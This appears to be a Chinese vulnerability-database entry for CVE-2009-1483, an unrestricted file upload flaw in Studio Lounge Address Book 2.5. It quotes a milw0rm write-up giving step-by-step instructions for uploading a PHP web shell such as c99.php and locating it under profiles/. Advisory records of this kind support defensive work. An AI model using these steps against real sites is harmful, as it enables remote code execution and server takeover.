Studio Lounge Address Book'upload-file.php'未限制文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117622 漏洞类型 其他
发布时间 2009-04-20 更新时间 2009-04-29
CVE编号 CVE-2009-1483 CNNVD-ID CNNVD-200904-546
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8481
https://cxsecurity.com/issue/WLB-2009050083
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-546
|漏洞详情
AdamPattersonStudioLoungeAddressBook2.5版本中的upload-file.php存在未限制文件上传漏洞。远程攻击者可以通过先上传一个带有可执行性扩展名的文件,然后再借助一个对profiles/中的文件的直接请求来访问它,从而实现任意代码执行。
|漏洞EXP
Address Book 2.5 (profile) Remote Shell Upload Vulnerability
bug found by Jose Luis Gongora Fernandez (a.k.a) JosS

contact: sys-project[at]hotmail.com
website: http://www.hack0wn.com/

- download: http://www.studiolounge.net/2007/08/17/address-book-25

- vuln file: upload-file.php

  The upload-file.php doesn't check the type of archive 
  and you can uploaded the phpshell on the server.


~ [EXPLOITING]

1) /index2.php?title=add (upload your shell, ex: c99.php)
2) you should go to your "View Full Information" (ex: index2.php?title=fullview&id=150)
3) you view source code and search "profiles/imagethumb.php?s=" (ex: profiles/imagethumb.php?
   s=57b7b72739c79f02d990c4239c4169b9.php)

4) view shell: http://target/profiles/57b7b72739c79f02d990c4239c4169b9.php

__h0__

# milw0rm.com [2009-04-20]
|参考资料

来源:XF
名称:addressbook-uploadfile-file-upload(49972)
链接:http://xforce.iss.net/xforce/xfdb/49972
来源:VUPEN
名称:ADV-2009-1111
链接:http://www.vupen.com/english/advisories/2009/1111
来源:BID
名称:34652
链接:http://www.securityfocus.com/bid/34652
来源:OSVDB
名称:53813
链接:http://www.osvdb.org/53813
来源:MILW0RM
名称:8481
链接:http://www.milw0rm.com/exploits/8481
来源:SECUNIA
名称:34761
链接:http://secunia.com/advisories/34761